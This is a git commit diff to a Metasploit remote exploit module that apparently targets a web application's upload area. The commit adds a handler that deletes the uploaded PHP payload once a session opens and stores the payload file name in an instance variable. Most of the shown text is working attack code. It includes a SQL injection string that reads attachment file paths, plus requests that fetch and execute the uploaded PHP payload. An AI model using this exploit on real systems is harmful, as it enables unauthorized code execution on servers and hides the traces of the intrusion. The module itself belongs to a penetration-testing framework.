ranking changed plus on_new_session handler added
parent
468030786f
commit
d6b28dc44d
|
@ -8,7 +8,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
@ -131,6 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
client.fs.file.rm("#{@token}.php")
|
||||
else
|
||||
client.shell_command_token("rm #{@token}.php")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
base = target_uri.path
|
||||
|
@ -205,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||
token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
||||
@token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||
else
|
||||
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
||||
end
|
||||
|
@ -217,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# attempt to retrieve real file name from the database
|
||||
if token.nil?
|
||||
if @token.nil?
|
||||
print_status("#{@peer} - Retrieving real file name from the database.")
|
||||
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
||||
begin
|
||||
|
@ -227,8 +237,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||
token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{token})")
|
||||
@token = $1
|
||||
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
||||
else
|
||||
print_error("#{@peer} - Could not retrieve file name from the database.")
|
||||
return
|
||||
|
@ -240,11 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# retrieve and execute PHP payload
|
||||
print_status("#{@peer} - Executing payload (#{token}.php)")
|
||||
print_status("#{@peer} - Executing payload (#{@token}.php)")
|
||||
begin
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{token}.php"
|
||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
|
|
Loading…
Reference in New Issue